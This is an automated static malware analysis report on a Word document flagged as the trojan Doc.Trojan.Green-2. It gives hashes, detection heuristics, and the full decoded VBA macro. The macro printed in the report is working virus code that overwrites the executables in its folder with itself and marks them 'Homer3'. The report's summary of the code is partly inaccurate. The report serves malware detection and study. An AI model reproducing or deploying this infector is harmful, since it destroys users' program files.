Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b2b261d3ef367290…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 28.5 KB
Created: 2000-12-30 18:37:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: ea97d5ac219171e983035113500e1dcf
SHA-1: 0d36e7f9da78162d49e43eb1a33d1485b6e38d78
SHA-256: b2b261d3ef3672900d02642069d86f21a374b8688e3d7e5be2e100892fbc8e22
Risk score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic

The sample is a Microsoft Word document containing VBA macros. The macro code attempts to write a second-stage executable to disk and displays a fake "critical information" message box to the user. The string 'Homer3' is appended to the end of the written file, likely as an infection marker (the code tests for it before writing) or as part of the payload.

Heuristics (2)

  • ClamAV: Doc.Trojan.Green-2 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Green-2
  • VBA macros detected [medium] (OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1651 bytes
SHA-256: ccce358919e7f55a9d3a5428f4221e34ba235f596a3da506274408f0dc875a7f
Extracted script preview (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Modul1"
Option Explicit
 Dim erej() As Byte
 Dim zrtva As String
 Const velicina As Integer = 24576
 Dim inf_znak As String
 Dim homer As String
 Private Sub Form_Load(): On Error Resume Next: GoTo a
a: Dim Free: GoTo b
b: Free = FreeFile: GoTo c
c: Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free: GoTo d
d: ReDim erej(velicina): GoTo e
e: Get #1, 1, erej: GoTo f
f: Close #Free: GoTo g
h: While zrtva <> "": GoTo k
g: zrtva = Dir(App.Path & "\" & "*.EXE"): GoTo h
k: Open App.Path & "\" & zrtva For Binary Access Read As #Free: GoTo l
l: homer = Strings.Space(LOF(Free)): GoTo o
o: Get #1, 1, homer: GoTo p
p: Close #Free: GoTo u
u: inf_znak = Mid(homer, Len(homer)): GoTo z
z: If Strings.LCase(inf_znak) <> "Homer3" Then: GoTo t
t: Open App.Path & "\" & zrtva For Binary Access Write As #Free: GoTo r
r: Put #1, , erej: GoTo w
w: Put #1, , velicina: GoTo q
q: Put #1, LOF(Free) + 6, "Homer3": GoTo s
s: Close #Free: GoTo v
v: zrtva = Dir(): GoTo n
n: Wend
If Day(Now()) = 7 Then
MsgBox "Ja sam Homer Veliki-Qurac!", vbCritical, "| Critical Information |"
If Month(Now()) = 7 Then
MsgBox "Damn! AVP sux!", vbExclamation, "AVP = 0"
'HLLO.Homer_Tha_Pile 3 by e[ax]
 'Greetz to all ppl on #virus
 'Greetings to all of BiHNet.ORG
 '"My Dream Is My Reality"
End If: End If
End Sub